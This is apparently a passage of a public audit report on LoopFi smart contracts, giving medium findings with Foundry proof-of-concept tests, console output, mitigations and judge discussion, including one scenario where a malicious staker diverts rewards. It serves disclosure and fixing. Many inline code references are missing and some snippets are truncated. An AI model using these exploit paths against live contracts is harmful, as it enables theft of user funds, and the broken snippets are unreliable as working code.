I agree with some of your points, and I think your conclusion is based off how this report is written and also the mitigation it suggests.
When the admin calls
, their intention could be to persist an RPS value for all epochs going forward. This RPS value will then be used when calculating rewards claimable by users. However, by calling the claim function more than once as mentioned in this report, both RPS and last RPS reset to 0; hence, reward distribution is effectively DOS’d.The only way this can then be fixed is if the admin is made aware of the issue and then sets RPS value again by calling
like you mentioned. But the issue is not fixed and will keep on happening and reward distribution to users will keep on getting disrupted and so on. Medium severity is appropriate, in my opinion.
Thank you for the input. Stays as-is.
[M-25] Incorrect address is used as spender
for ERC20 permit signature verification
Submitted by 0xpiken, also found by Rhaydden, hash, and pkqs90
The failure of permit signature verification might revert the whole function.
might revert if ERC20 permit signature is used as permitParams
Proof of Concept
The IERC20Permit(token).safePermit()
call is supposed to allow spender
to spend up to approvalAmount
of token on behalf of from
. The spender
in _transferFrom()
should be the contract itself:
@> IERC20(token).safeTransferFrom(from, to, amount);
However, IERC20Permit(token).safePermit()
use to
as spender
to verify the permit signature. The safePermit()
call will be reverted if to
is not same as the contract itself.
Copy below codes to PositionAction20.t.sol and run forge test --match-test test_increaseLeverWithInvalidPermission
function test_increaseLeverWithInvalidPermission() public {
uint256 upFrontUnderliers = 20_000 ether;
uint256 borrowAmount = 70_000 ether;
uint256 amountOutMin = 69_000 ether;
deal(address(USDC), user, upFrontUnderliers);
// build increase lever params
address[] memory assets = new address[](2);
assets[0] = address(underlyingToken);
assets[1] = address(USDC);
LeverParams memory leverParams = LeverParams({
position: address(userProxy),
vault: address(vault),
collateralToken: address(USDC),
primarySwap: SwapParams({
swapProtocol: SwapProtocol.UNIV3,
swapType: SwapType.EXACT_IN,
assetIn: address(underlyingToken),
amount: borrowAmount,
limit: amountOutMin,
recipient: address(positionAction),
deadline: block.timestamp + 100,
args: abi.encode(weightedPoolIdArray, assets)
auxSwap: emptySwap,
auxAction: emptyPoolActionParams
PermitParams memory permitParams;
uint256 deadline = block.timestamp + 100;
//@audit-info the spender is userProxy
(uint8 v, bytes32 r, bytes32 s) = PermitMaker.getPermitTransferFromSignature(
20_000 ether,
permitParams = PermitParams({
approvalType: ApprovalType.PERMIT,
approvalAmount: 20_000 ether,
nonce: 0,
deadline: deadline,
v: v,
r: r,
s: s
// call increaseLever
//@audit-info revert due to invalid signature because `to` is used as `spender` to verify the signature,
//@audit-info while `to` inside the function `increaseLever()` is address(positionAction) instead of `userProxy`
vm.expectRevert("EIP2612: invalid signature");
20_000 ether,
Recommended Mitigation Steps
Use address(this)
as spender
for safePermit()
- to,
+ address(this),
IERC20(token).safeTransferFrom(from, to, amount);
Assessed type
I believe the issue is invalid. Every instance of the code where
is called usesto == address(this)
which isaddress(this)
As stated in the report, the
will have an issue. Becauseself
is notaddress(this)
when triggered bydelegatecall
through a PRBProxy.self
is the PositionAction.sol, whileaddress(this)
is the proxy’s address.
No further change on this.
[M-26] PoolV3#repayCreditAccount()
use incorrect share converting function to calculate profit and loss
Submitted by 0xpiken, also found by Afriauditor (1, 2), Agontuk, VAD37, monrel, and Trooper
Either the profit or the loss is calculated incorrectly, resulting in the treasury owns incorrect profit balance.
Proof of Concept
Anyone can deposit WETH
for lpETH
by calling PoolV3#deposit()
or PoolV3#mint()
. The exchange rate of WETH:lpETH
is 1:1
The eligible credit manager can borrow WETH
by calling PoolV3#lendCreditAccount()
, and repay the debt and profit lately by calling PoolV3#repayCreditAccount()
The corresponding amount of lpETH
will be minted to treasury
if there is profit, and the corresponding amount of lpETH
should be burned from treasury
if there is any loss:
if (profit > 0) {
@> _mint(treasury, convertToShares(profit)); // U:[LP-14B]
} else if (loss > 0) {
address treasury_ = treasury;
uint256 sharesInTreasury = balanceOf(treasury_);
@> uint256 sharesToBurn = convertToShares(loss);
if (sharesToBurn > sharesInTreasury) {
unchecked {
emit IncurUncoveredLoss({
creditManager: msg.sender,
loss: convertToAssets(sharesToBurn - sharesInTreasury)
}); // U:[LP-14D]
sharesToBurn = sharesInTreasury;
_burn(treasury_, sharesToBurn); // U:[LP-14C,14D]
However, convertToShares()
is used to calculate shares for profit and loss, while _convertToShares()
is used to calculate shares in PoolV3#deposit()
uses the exchange rate of E4626
to calculate shares instead of 1:1
exchange rate defined in PoolV3
The incorrect convertToShares()
call could highly return less shares than expected, resulting in the treasury owning incorrect balance.
Recommended Mitigation Steps
Use _convertToShares()
for share calculation:
if (profit > 0) {
- _mint(treasury, convertToShares(profit)); // U:[LP-14B]
+ _mint(treasury, _convertToShares(profit));
} else if (loss > 0) {
address treasury_ = treasury;
uint256 sharesInTreasury = balanceOf(treasury_);
- uint256 sharesToBurn = convertToShares(loss);
+ uint256 sharesToBurn = _convertToShares(loss);
if (sharesToBurn > sharesInTreasury) {
unchecked {
emit IncurUncoveredLoss({
creditManager: msg.sender,
loss: convertToAssets(sharesToBurn - sharesInTreasury)
}); // U:[LP-14D]
sharesToBurn = sharesInTreasury;
_burn(treasury_, sharesToBurn); // U:[LP-14C,14D]
Assessed type
[M-27] Rewards may be spread out among the wrong time period due to the way the protocol calculates it
Submitted by rscodes
First, lets reference how the rewards are calculated when a 2nd incentive is introduced while another incentive is still within its rewardsDuration
In MultiFeeDistribution.sol
’s _notifyReward
// inside function _notifyReward(address rewardToken, uint256 reward):
if (block.timestamp >= r.periodFinish) {
} else {
-> uint256 remaining = r.periodFinish - block.timestamp;
-> uint256 leftover = (remaining * r.rewardPerSecond) / 1e12;
-> r.rewardPerSecond = ((reward + leftover) * 1e12) / rewardsDuration;
This will cause rewards from the initial incentive to be delayed and spread out across the 2nd incentive’s period and initial stakers will have wrong amount of claimable rewards during the timestamps all the way until the 2nd incentive’s rewardsDuration
ends. Other than delays, the original staker could also possibly permanently lose some of their deserved reward tokens, as described further below in “2nd way of exploit” section.
Proof of Code
The symbol diagram below demonstrates the scenario ran in the foundry test:
[----A----|----B----] (1st incentive)
[---------C---------] (2nd incentive)
Day: 0 15 30 45
- We will use
rewardsDuration = 30 days
. - The first
represents the 1st incentive, which was introduced onday 0
, whereA
represents the first half of the rewards that should be given out during the first half of the first incentive’srewardDuration
period. AndB
represents the second half respectively. - The second
represents the 2nd incentive, which was introduced onday 15
, whereC
represents all the rewards from the 2nd incentive to be rewarded.
01: function test_rewardsSpreadAcrossWrongPeriod() public {
02: assert(rewardsDuration == 30 days); // we will use 30 days as the rewardsDuration for convenience
03: address Alice = address(0x123456);
04: uint256 amount = 1 ether;
05: uint256[] memory lockDurations = new uint256[](1);
06: uint256[] memory rewardMultipliers = new uint256[](1);
07: lockDurations[0] = 700 days;
08: rewardMultipliers[0] = 1;
09: multiFeeDistribution.setLockTypeInfo(lockDurations, rewardMultipliers);
11: stakeToken.mint(address(this), amount);
12: multiFeeDistribution.setLPToken(address(stakeToken));
14: multiFeeDistribution.setAddresses(IChefIncentivesController(vm.addr(uint256(keccak256("incentivesController")))), vm.addr(uint256(keccak256("treasury"))));
15: vm.mockCall(
16: vm.addr(uint256(keccak256("incentivesController"))),
17: abi.encodeWithSelector(IChefIncentivesController.afterLockUpdate.selector, Alice),
18: abi.encode(true)
19: );
20: stakeToken.approve(address(multiFeeDistribution), amount);
21: multiFeeDistribution.stake(amount, Alice, 0); // Alice now has 1 ether staked (with lockTypeIndex=0)
22: require(multiFeeDistribution.lockedBalance(Alice) == amount);
24: address[] memory minters = new address[](1);
25: minters[0] = address(this);
26: multiFeeDistribution.setMinters(minters);
28: amount = 10000 ether;
29: loopToken.mint(address(this), amount);
30: loopToken.transfer(address(multiFeeDistribution), amount);
32: vm.mockCall(
33: mockPriceProvider,
34: abi.encodeWithSelector(IPriceProvider.getRewardTokenPrice.selector, address(loopToken), amount),
35: abi.encode(8)
36: );
37: multiFeeDistribution.vestTokens(address(multiFeeDistribution), amount, false);//1st incentive introduced on day 0
39: skip(15 days); //go to day 15
40: address[] memory rewardTokens_ = new address[](1);
41: rewardTokens_[0] = address(loopToken);
42: vm.prank(Alice);
43: multiFeeDistribution.getReward(rewardTokens_); //withdraw at day 15
44: console.log("Alice's balance at day 15| ", loopToken.balanceOf(Alice));
46: loopToken.mint(address(this), amount);
47: loopToken.transfer(address(multiFeeDistribution), amount);
48: multiFeeDistribution.vestTokens(address(multiFeeDistribution), amount, false);//2nd incentive introduced on day 15
50: skip(15 days); //go to day 30
51: vm.prank(Alice);
52: multiFeeDistribution.getReward(rewardTokens_); //withdraw at day 30
53: console.log("Alice's balance at day 30|", loopToken.balanceOf(Alice)); //reminder: Alice's current loopToken balance is inclusive of what she withdrew on day 15
54: }
Console Output:
Ran 1 test for src/test/unit/MultiFeeDistribution.t.sol:MultiFeeDistributionTest
[PASS] test_rewardsSpreadAcrossWrongPeriod() (gas: 813968)
Alice's balance at day 15| 4999999999999999999999
Alice's balance at day 30| 12499999999999999999998
Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 6.43ms (1.46ms CPU time)
Ran 1 test suite in 320.56ms (6.43ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)
- (Line 37) As mentioned, we introduce the first incentive (
10000 ether
) at day 0. - (Line 43) At day 15, Alice withdraws her tokens, receiving part
as seen in the symbol diagram. (4999999999999999999999
5000 ether
) - (Line 48) 2nd Incentive (
10000 ether
) is introduced at day 15, causing remaining rewards leftover from the first incentive to be incorrectly stretched until the end of the 2nd incentive’srewardDuration
. - (Line 52) At day 30, Alice withdraws her tokens, now her total balance is
12500 ether
Let’s examine Alice’s balance at the end of 30 days: 12500 ether
= 5000 ether
+ 2500 ether
+ 5000 ether
= A
+ B/2
+ C/2
However, the rightful amount of rewards her balance should be at day 30 is: A
+ B
+ C/2
= 15000 ether
. The remaining 15000 ether
- 12500 ether = 2500 ether
that Alice is entitled to claim at day 30, will only be given throughout days 30 to 45.
This is very unfair to Alice who has staked her tokens since the beginning of the first incentive, and now she has to wait longer for the rewards from the first incentive which is a high opportunity cost incurred for her.
This is made worse if the incentive given at the 2nd wave is significantly smaller than the original amount in wave 1, because it means she will have to wait longer for her significant rewards from the 1st wave; all because of the 2nd wave of small and insignificant incentive.
2nd way of exploit
Referencing the same scenario in the Proof of Code section. A malicious staker can choose to stake anytime between day 30 to day 45 and because of that, Alice can permanently lose some of her rewards.
- Malicious staker sees the scenario in the above section happening, and decides to call
on day 30. - When the malicious staker withdraws on day 45, he is able to receive a portion of reward part
, even though he is not supposed to; we already established in the symbol diagram that partB
is supposed to end on day 30. Since the malicious staker only staked on day 30, he should not be getting the rewards as he locked his tokens late. Alice permanently loses a portion of reward partB
to the malicious staker who is not supposed to receive it.
Overall Disclaimer: The example above of the 2nd incentive being introduced at exactly halfway (15 days) of the 1st incentive’s duration was just used as an example. This bug still exists as long as the 2nd incentive is introduced at any point of time throughout the 1st incentive’s duration, causing the respective portion to be spread across the wrong period.
Recommended Mitigation Steps
+ struct rewardQueue {
+ uint256 periodFinish;
+ uint256 rewardPerSecond;
+ }
// below is the struct from src/reward/interfaces/LockedBalance.sol
struct Reward {
- uint256 periodFinish;
- uint256 rewardPerSecond;
+ rewardQueue[] rewards;
+ uint256 rewardCounter;
uint256 lastUpdateTime;
uint256 rewardPerTokenStored;
uint256 balance;
We can use a queue-like list to store rewards and their respective periodFinish
, as well as a counter that we can increment when rewards[rewardCounter].periodFinish
is meant to be distributed between the timeframe of rewards[i-1].periodFinish
to rewards[i].periodFinish
Tools Used
Foundry, VSCode
Assessed type
@Koolex -
is an exact fork of Radiant’s; the scenario that the warden pointed out to is intended.
Koolex (judge) decreased severity to Medium and commented:
While this is an exact fork of Radiant, it does not mean it wouldn’t have issues. The following both statements could be right:
- Sponsor has intention the same Radiant has on their contract, therefore, the issue above would be a QA.
- Sponsor has intention the same Radiant has on their contract, but couldn’t know this issue exists (regardless if it was intended by Radiant), unless subjecting it to an audit which is what happened.
However, since the sponsor confirmed this, a Medium severity is appropriate.
[M-28] BalancerOracle::update()
can return a stale price
Submitted by 4B, also found by Bauchibred and Evo
Whenever block.timestamp - lastUpdate > updateWaitWindow
and needs to update the price, it will return a stale price because it will fetch the price from the lastUpdate
not the currentUpdate
Proof of Concept
In the update()
function these are the lines we’ll find:
//@audit let's say price is out of date and its getting updated won't it get the price from one hour ago?
//problem is it uses a current timestamp but with an hour old price
if (block.timestamp - lastUpdate < updateWaitWindow) revert BalancerOracle__update_InUpdateWaitWindow();
// update the safe price first
safePrice = safePrice_ = currentPrice;
lastUpdate = block.timestamp;
uint256[] memory weights = IWeightedPool(pool).getNormalizedWeights();
uint256 totalSupply = IWeightedPool(pool).totalSupply();
uint256 totalPi = WAD;
uint256[] memory prices = new uint256[](weights.length);
// update balances in 18 decimals
for (uint256 i = 0; i < weights.length; i++) {
// reverts if the price is invalid or stale
prices[i] = _getTokenPrice(i);
uint256 val = wdiv(prices[i], weights[i]);
uint256 indivPi = uint256(wpow(int256(val), int256(weights[i])));
totalPi = wmul(totalPi, indivPi);
currentPrice = wdiv(wmul(totalPi, IWeightedPool(pool).getInvariant()), totalSupply);
From the code, we can see that the currentPrice
is the last thing updated.
Whenever the updateWindow
reaches or passes for us to fetch a new price, the safePrice
is updated first, which is the value from the lastUpdate
which is “stale”.
It can be argued that its a design decision meaning the updateWindow
is just time it needs to fetch a new price, but it doesn’t mean the price is old. However, the updateWindow
can be passed and not updated right after meaning the price is two times back because it wasn’t updated right away.
Recommended Mitigation Steps
Revisit the logic to be able to fetch fresh price whenever there need to be a new price fetched.
Assessed type
0xtj24 (LoopFi) acknowledged and commented:
That logic updates the price only after a certain
has passed, storing the oldest safe price. If not updated with the keeper it will return stale price depending on thestalePeriod
. This is an expected behaviour.
is immutable, it can’t be changed. Therefore, keeping the severity to Medium.
[M-29] Bug in claim
allows users who are disqualified to claim their previously earned emissions
Submitted by rscodes, also found by pkqs90
In ChefIncentivesController.sol
function claim(address _user, address[] memory _tokens) public whenNotPaused {
if (eligibilityMode != EligibilityModes.DISABLED) {
-> if (!eligibleDataProvider.isEligibleForRewards(_user)) revert EligibleRequired();
-> checkAndProcessEligibility(_user, true, true);
The function calls isEligibleForRewards
without calling refresh
; hence, things like disqualification resulting from a change in price will not be accounted for. This transaction will go through without reverting, allowing the user to claim
even though his total value locked is now below 5% of his debt due to the price change of the token.
The checkAndProcessEligibility(_user, true, true);
function, however, does include refresh
, which will update the user’s status. Hence, that line should be called first, so that the transaction will revert in the if statement
, to prevent malicious lockers from calling this function even when they are not eligible.
Recommended Mitigation Steps
function claim(address _user, address[] memory _tokens) public whenNotPaused {
if (eligibilityMode != EligibilityModes.DISABLED) {
- if (!eligibleDataProvider.isEligibleForRewards(_user)) revert EligibleRequired();
- checkAndProcessEligibility(_user, true, true);
// swap the order !!
+ checkAndProcessEligibility(_user, true, true);
+ if (!eligibleDataProvider.isEligibleForRewards(_user)) revert EligibleRequired();
uint256 currentTimestamp = block.timestamp;
uint256 pending = userBaseClaimable[_user];
userBaseClaimable[_user] = 0;
uint256 _totalAllocPoint = totalAllocPoint;
uint256 length = _tokens.length;
for (uint256 i; i < length; ) {
if (!validRTokens[_tokens[i]]) revert InvalidRToken();
VaultInfo storage pool = vaultInfo[_tokens[i]];
if (pool.lastRewardTime == 0) revert UnknownPool();
_updatePool(pool, _totalAllocPoint);
UserInfo storage user = userInfo[_tokens[i]][_user];
uint256 rewardDebt = (user.amount * pool.accRewardPerShare) / ACC_REWARD_PRECISION;
pending = pending + rewardDebt - user.rewardDebt;
user.rewardDebt = rewardDebt;
user.lastClaimTime = currentTimestamp;
unchecked {
_vestTokens(_user, pending);
Assessed type
Invalid Validation
amarcu (LoopFi) confirmed and commented:
Other users can claim if a user becomes ineligible, if no one claims the user can, but the check can be added. Would consider this a Medium.
Koolex (judge) decreased severity to Medium and commented:
@amarcu - per my understanding, the issue is, users are claiming based on outdated eligibility check since
is called after.
[M-30] Usage of lastEligibleStatus
can cause user to miss out on rewards on manualStopEmissionsFor
Submitted by hash, also found by lanrebayode77 and novamanbg
Invoking manualStopEmissionsFor
can cause the user to miss out on rewards from vaults even after the user becomes eligible.
Proof of Concept
If lastEligibleStatus
and isCurrentlyEligible
returns true, only the balance of the specific vault is updated. The idea is that whenever both these are true, all the other balances would have already been updated to the current value and hence need not be re-queried again.
function handleActionAfter(address _user, uint256 _balance, uint256 _totalSupply) external {
if (!validRTokens[msg.sender] && msg.sender != address(mfd)) revert NotRTokenOrMfd();
if (_user == address(mfd) || eligibilityExempt[_user]) {
if (eligibilityMode == EligibilityModes.FULL) {
bool lastEligibleStatus = eligibleDataProvider.lastEligibleStatus(_user);
bool isCurrentlyEligible = eligibleDataProvider.refresh(_user);
if (isCurrentlyEligible) {
if (lastEligibleStatus) {
_handleActionAfterForToken(msg.sender, _user, _balance, _totalSupply);
} else {
} else {
But this assumption is broken when manualStopEmissionsFor
is called which will set the balance corresponding to each vault as 0:
function manualStopEmissionsFor(address _user, address[] memory _tokens) public isWhitelisted {
if (_user == address(0)) revert AddressZero();
uint256 length = _tokens.length;
for (uint256 i; i < length; ) {
address token = _tokens[i];
uint256 newTotalSupply = pool.totalSupply - amount;
user.amount = 0;
user.rewardDebt = 0;
pool.totalSupply = newTotalSupply;
emit BalanceUpdated(token, _user, 0, newTotalSupply);
In this case, if an user’s vault position update makes the user eligible for rewards, only that specific vault associated debt will be earning rewards and all the other vault balances won’t be updated.
Recommended Mitigation Steps
The lastEligibleStatus
check can be removed or it can be handled alongside the manualStopEmissionsFor
[M-31] Discrepancy between the lastRewadTime
and the lastAllPoolUpdate
can allow for incorrect reward distribution to pools if registerRewardDeposit
deposits less assets
Submitted by hash, also found by Rhaydden, seaona, lanrebayode77, lian886, and novamanbg
Incorrect reward distribution causing some pools to gain more while others to gain less.
Proof of Concept
The _massUpdatePools
function always sets lastAllPoolUpdate = block.timestamp
function _massUpdatePools() internal {
uint256 totalAP = totalAllocPoint;
uint256 length = poolLength();
for (uint256 i; i < length; ) {
_updatePool(vaultInfo[registeredTokens[i]], totalAP);
unchecked {
lastAllPoolUpdate = block.timestamp;
But the individualPool
update timestamp can become lower than block.timestamp
if it surpasses the endRewardTime
; i.e., the time in which the entire assets deposited is supposed to be depleted.
function _updatePool(VaultInfo storage pool, uint256 _totalAllocPoint) internal {
uint256 timestamp = block.timestamp;
uint256 endReward = endRewardTime();
if (endReward <= timestamp) {
timestamp = endReward;
if (timestamp <= pool.lastRewardTime) {
(uint256 reward, uint256 newAccRewardPerShare) = _newRewards(pool, _totalAllocPoint);
accountedRewards = accountedRewards + reward;
pool.accRewardPerShare = pool.accRewardPerShare + newAccRewardPerShare;
pool.lastRewardTime = timestamp;
Furthermore, the endRewardTime
is calculated as newEndTime = (unclaimedRewards + extra) / rewardsPerSecond + lastAllPoolUpdate
whenever the rewardsPerSecond
is non-zero:
function endRewardTime() public returns (uint256) {
if (rewardsPerSecond == 0) {
endingTime.estimatedTime = type(uint256).max;
return type(uint256).max;
} else {
uint256 newEndTime = (unclaimedRewards + extra) / rewardsPerSecond + lastAllPoolUpdate;
endingTime.estimatedTime = newEndTime;
return newEndTime;
If a _massUpdatePools
call occurs when block.timestamp
is greater than the endRewardTime
, it will set the lastRewardTime
of pools to be less than lastAllPoolUpdate
; following which even if there are no more rewards, the new endRewardTime
would be the timestamp of lastAllPoolUpdate
. This will allow a pool to claim rewards worth (lastAllPoolUpdate - initialEndTime) * rewardPerSecond
which is not an expected behaviour and not handled with the endRewardTime
The above scenario can occur if the registerRewardDeposit
function is invoked with a low amount of deposits (i.e., the deposited amount shouldn’t cause the new end time to be >= block.timestamp
) when the endRewardTime
has been surpassed.
- pool A and B, 1:1
= 1endRewardTime
= 100block.timestamp
= 110
is invoked such that the new endRewardTime
(i.e., even after including the newly deposited assets) is 105.
Now, the first massUpdatePools
call will result in:
= 105 (endRewardTime
= 110
The entire rewards of the contract are used up, but when massUpdatePools
gets invoked again (e.g., via claim
-> _updateEmissions
-> _massUpdatePools
), the new endTime
will be 110 (i.e., lastPoolUpdate + 0
is called for pool A in the same block, and A’s lastRewardTime
gets updated to 110 while B’s remain 105. At 120 registerRewardDeposit
is invoked with a lot of assets and B will accrue a reward of (120 - 105)/2
while A will only accrue (120 - 110)/2
Recommended Mitigation Steps
In case endTime > block.timestamp
, can set the lastPoolUpdate
to endTime
or always ensure that the registerRewardDeposit
function will only be called with amounts such that the above issue doesn’t occur.
Assessed type
[M-32] Emission schedule is not followed and can cause unexpected allocation of rewards
Submitted by hash
Whenever a new emission schedule is to be followed, i.e., block.timestamp
becomes greater than the startOffset
of the schedule, the setScheduledRewardsPerSecond
function invokes the _massUpdatePools
function in order to bring the pools to the latest state.
function setScheduledRewardsPerSecond() internal {
if (!persistRewardsPerSecond) {
uint256 length = emissionSchedule.length;
uint256 i = emissionScheduleIndex;
uint128 offset = uint128(block.timestamp - startTime);
for (; i < length && offset >= emissionSchedule[i].startTimeOffset; ) {
unchecked {
if (i > emissionScheduleIndex) {
emissionScheduleIndex = i;
=> _massUpdatePools();
rewardsPerSecond = uint256(emissionSchedule[i - 1].rewardsPerSecond);
Inside the _massUpdatePools
, the previous rewardsPerSecond
is used until block.timestamp
instead of the startOffset
of the new schedule; i.e., the correct update of oldRewardsPerSecond * (newScheduleStartTimestamp - lastUpdateStamp) + newRewardsPerSecond * (block.timestamp - newScheduleStartTimestamp)
is not used.
_massUpdatePools -> _updatePool -> _newRewards
function _newRewards(
VaultInfo memory pool,
uint256 _totalAllocPoint
) internal view returns (uint256 newReward, uint256 newAccRewardPerShare) {
uint256 lpSupply = pool.totalSupply;
if (lpSupply > 0) {
uint256 duration = block.timestamp - pool.lastRewardTime;
uint256 rawReward = duration * rewardsPerSecond;
Recommended Mitigation Steps
Correct the formula to similar like: oldRewardsPerSecond * (newScheduleStartTimestamp - lastUpdateStamp) + newRewardsPerSecond * (block.timestamp - newScheduleStartTimestamp)
@Koolex - this
code is basically the same as RadiantV2.I think all public Radiant issues should be out-of-scope, and that sponsors are aware of. Specifically, this report from Blocksec: “3.2.4 Potential Issue 5: Skippable Emission schedules” talks about basically the same thing as this issue, which is that emissions schedules may be not followed (and even skipped).
It is understandable for Radiant to not fix this since this is a edge case considering that emission schedule is updated frequently and the impacted amount of tokens are very small.
This issue is different than the one reported by Blocksec. Here, it is about the math, theirs is about skipping a schedule if the function is not invoked.
However, even if it is the same, as per my knowledge, there is no rule in C4 that says public issues somewhere else are out of scope, also not mentioned by the sponsor.
Given above, this issue stays as-is.
[M-33] PositionAction.sol#onCreditFlashLoan
may have leftover tokens after conducting leverParams.auxSwap
Submitted by pkqs90, also found by pkqs90, lian886, Bauchibred, 0xbepresent, and hash (1, 2)
First, let’s inspect how deposit decreaseLever
with swap enabled works:
- Borrow loans from flashLender.
- Repays CDPVault debt with the borrowed loans.
- Withdraws collateral from CDPVault.
- Conducts a
and swap collateral to debt token.
Now, step 4 is an EXACT_OUT
swap, since it is forced to swap the exact amount of debt tokens used to repay the flashloan. However, after step 4, there may be some collateral tokens left, which is the residualAmount
If leverParams.auxSwap
is not enabled, the collateral token is simply sent back to the recipient. However, if leverParams.auxSwap
is enabled, a swap is performed.
The issue here is, the leverParams.auxSwap
swap is an EXACT_IN
swap, and user would hardcode the amount of inTokens
used for this swap. There is no way to know the exact amount of collateral tokens left after step 4, so there must still be some collateral tokens leftover after the leverParams.auxSwap
These leftover tokens are not sent to anybody, and stuck in the contract.
function decreaseLever(
LeverParams calldata leverParams,
uint256 subCollateral,
address residualRecipient
) external onlyDelegatecall {
// validate the primary swap
if (leverParams.primarySwap.swapType != SwapType.EXACT_OUT || leverParams.primarySwap.recipient != self)
revert PositionAction__decreaseLever_invalidPrimarySwap();
// validate aux swap if it exists
> if (leverParams.auxSwap.assetIn != address(0) && (leverParams.auxSwap.swapType != SwapType.EXACT_IN))
revert PositionAction__decreaseLever_invalidAuxSwap();
function onCreditFlashLoan(
address /*initiator*/,
uint256 /*amount*/,
uint256 /*fee*/,
bytes calldata data
) external returns (bytes32) {
if (msg.sender != address(flashlender)) revert PositionAction__onCreditFlashLoan__invalidSender();
LeverParams memory leverParams,
uint256 subCollateral,
address residualRecipient
) = abi.decode(data,(LeverParams, uint256, address));
uint256 subDebt = leverParams.primarySwap.amount;
underlyingToken.forceApprove(address(leverParams.vault), subDebt);
// sub collateral and debt
// withdraw collateral and handle any CDP specific actions
uint256 withdrawnCollateral = _onDecreaseLever(leverParams, subCollateral);
bytes memory swapData = _delegateCall(
uint256 swapAmountIn = abi.decode(swapData, (uint256));
// swap collateral to stablecoin and calculate the amount leftover
uint256 residualAmount = withdrawnCollateral - swapAmountIn;
// send left over collateral that was not needed to payback the flash loan to `residualRecipient`
if (residualAmount > 0) {
// perform swap from collateral to arbitrary token if necessary
> if (leverParams.auxSwap.assetIn != address(0)) {
} else {
// otherwise just send the collateral to `residualRecipient`
IERC20(leverParams.primarySwap.assetIn).safeTransfer(residualRecipient, residualAmount);
underlyingToken.forceApprove(address(flashlender), subDebt);
Recommended Mitigation Steps
Send the amount of IERC20(leverParams.primarySwap.assetIn).balance(address(this))
to residualRecipient
to make sure there are no leftovers.
[M-34] PositionAction.sol#_deposit
incorrectly checks auxSwap.assetIn
should be equal to collateralParams.targetToken
Submitted by pkqs90
incorrectly checks auxSwap.assetIn
should be equal to collateralParams.targetToken
. This is incorrect, because auxSwap.assetIn
should be the token used to swap for collateralParams.targetToken
Bug Description
First, let’s inspect how deposit works with swap enabled:
token to Proxy.- Proxy performs a swap (Balancer or Uniswap) to get collateral token.
- Deposit collateral tokens.
The issue here is, during step 2, the swap is to exchange auxSwap.assetIn
for collateralParams.targetToken
. This means that the two tokens must not be equal. However, the current implementation checks that they are the same. This means the swap feature is completely unusable.
function _deposit(
address vault,
address position,
CollateralParams calldata collateralParams,
PermitParams calldata permitParams
) internal returns (uint256) {
uint256 amount = collateralParams.amount;
if (collateralParams.auxSwap.assetIn != address(0)) {
if (
> collateralParams.auxSwap.assetIn != collateralParams.targetToken ||
collateralParams.auxSwap.recipient != address(this)
) revert PositionAction__deposit_InvalidAuxSwap();
amount = _transferAndSwap(collateralParams.collateralizer, collateralParams.auxSwap, permitParams);
} else if (collateralParams.collateralizer != address(this)) {
return _onDeposit(vault, position, collateralParams.targetToken, amount);
Recommended Mitigation Steps
Remove the check.
]# Assessed type
Invalid Validation
amarcu (LoopFi) disputed and commented:
The flow is correct, for example this is a test function where we go from USDC to the collateral token.
function test_deposit_vault_with_entry_swap_from_USDC() public { uint256 depositAmount = 10_000 * 1e6; uint256 amountOutMin = (depositAmount * 1e12 * 98) / 100; // convert 6 decimals to 18 and add 1% slippage deal(address(USDC), user, depositAmount); // build increase collateral params bytes32[] memory poolIds = new bytes32[](1); poolIds[0] = stablePoolId; address[] memory assets = new address[](2); assets[0] = address(USDC); assets[1] = address(token); CollateralParams memory collateralParams = CollateralParams({ targetToken: address(USDC), amount: 0, // not used for swaps collateralizer: address(user), auxSwap: SwapParams({ swapProtocol: SwapProtocol.BALANCER, swapType: SwapType.EXACT_IN, assetIn: address(USDC), amount: depositAmount, // amount to swap in limit: amountOutMin, // min amount of collateral token to receive recipient: address(userProxy), deadline: block.timestamp + 100, args: abi.encode(poolIds, assets) }) }); uint256 expectedCollateral = _simulateBalancerSwap(collateralParams.auxSwap); vm.prank(user); USDC.approve(address(userProxy), depositAmount); vm.prank(user); userProxy.execute( address(positionAction), abi.encodeWithSelector( positionAction.deposit.selector, address(userProxy), address(vault), collateralParams, emptyPermitParams ) ); (uint256 collateral, uint256 debt, , , , ) = vault.positions(address(userProxy)); assertEq(collateral, expectedCollateral); assertEq(debt, 0); }
Requesting a PoC from the warden, only in PJQA please. Will re-evaluate then.
@amarcu @Koolex - First, let’s see how
is defined. From// optional swap from targetToken to collateral, or collateral to targetToken
we can see that if there is a swap existent, thetargetToken
can be either theinputToken
or theoutputToken
. The issue is that the buggy check forcestargetToken
to beinputToken
, and does not allow for it being the output token.struct CollateralParams { // token passed in or received by the caller address targetToken; // amount of collateral to add in CDPVault.tokenScale() or to remove in WAD uint256 amount; // address that will transfer the collateral or receive the collateral address collateralizer; // optional swap from `targetToken` to collateral, or collateral to `targetToken` SwapParams auxSwap; }
if (collateralParams.auxSwap.assetIn != address(0)) { if ( > collateralParams.auxSwap.assetIn != collateralParams.targetToken || collateralParams.auxSwap.recipient != address(this) ) revert PositionAction__deposit_InvalidAuxSwap(); amount = _transferAndSwap(collateralParams.collateralizer, collateralParams.auxSwap, permitParams); } ... return _onDeposit(vault, position, collateralParams.targetToken, amount);
We can also see that at the end of the function, a
_onDeposit(vault, position, collateralParams.targetToken, amount);
is called to deposit the token to vault, which passes on thecollateralParams.targetToken
for depositing in vault.The most common use case is to swap random input
, and deposittargetToken
into vault. For this case, if we forcetargetToken
to beinputToken
, the swap doesn’t make sense.Now, responding to the passing unit test. The unit test dataflow is, user sets USDC as
, andtargetToken
also as USDC. However, the vault receives a differenttoken
than USDC. But why did the unit test pass?Because for the PositionAction20.sol, the
function doesn’t about care the passed in token; thus, it doesn’t matter whichever token we set astargetToken
. But for PositionAction4626.sol, thetargetToken
is used to check if it is the collateral for vault, and if not, it will perform a ERC4626 deposit first, and in this case, if thetargetToken
is incorrect, the deposit would fail.vault = createCDPVault( token, // token 5_000_000 ether, // debt ceiling 0, // debt floor 1.25 ether, // liquidation ratio 1.0 ether, // liquidation penalty 1.05 ether // liquidation discount );
function _onDeposit(address vault, address position, address /*src*/, uint256 amount) internal override returns (uint256) { address collateralToken = address(ICDPVault(vault).token()); IERC20(collateralToken).forceApprove(vault, amount); return ICDPVault(vault).deposit(position, amount); }
